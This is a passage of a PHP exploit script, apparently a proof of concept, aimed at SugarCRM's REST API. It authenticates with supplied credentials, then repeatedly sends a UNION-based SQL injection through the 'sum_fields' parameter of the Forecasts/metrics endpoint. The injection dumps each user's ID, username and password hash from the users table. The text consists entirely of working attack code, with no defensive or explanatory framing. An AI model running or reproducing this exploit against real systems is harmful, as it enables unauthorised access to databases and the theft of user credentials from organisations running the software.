\n"); list($url, $user, $pass) = [$argv[1], $argv[2], $argv[3]]; print "[-] Logging in with username '{$user}' and password '{$pass}'\n"; $ch = curl_init(); $login = ["username" => $user, "password" => $pass, "grant_type" => "password", "client_id" => "sugar"]; curl_setopt($ch, CURLOPT_URL, "{$url}rest/v10/oauth2/token"); curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($login)); curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: application/json"]); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); if (($token = (json_decode(curl_exec($ch)))->access_token) == null) die("[-] Login failed!\n"); print "[-] Executing SQL injection attack\n"; curl_setopt($ch, CURLOPT_URL, "{$url}rest/v10/Forecasts/metrics"); curl_setopt($ch, CURLOPT_HTTPHEADER, ["OAuth-Token: {$token}", "Content-Type: application/json"]); $in = "''"; $sql = "1), CONCAT(id,'||',user_name,'||',user_hash) metric_count FROM users WHERE user_name NOT IN (%s) UNION SELECT 1,2,3 FROM purchased_line_items WHERE ((purchased_line_items.team_set_id IN (SELECT tst.team_set_id FROM team_sets_teams tst#"; $params = ["module" => "PurchasedLineItems", "filter" => [], "user_id" => "", "type" => "", "time_period" => "", "metrics" => [0 => ["filter" => []]]]; print "============================================================================\n"; while(1) { $params["metrics"][0]["sum_fields"] = sprintf($sql, $in); curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($params)); if (($metrics = (json_decode(curl_exec($ch), true))["metrics"]) == null) die("[-] Attack failed!\n"); if (count($info = explode("||", $metrics[""]["values"]["count"])) != 3) break; $in .= ",'{$info[1]}'"; print "[-] User ID...: {$info[0]}\n"; print "[-] Username..: {$info[1]}\n"; print "[-] Password..: {$info[2]}\n"; print "============================================================================\n"; }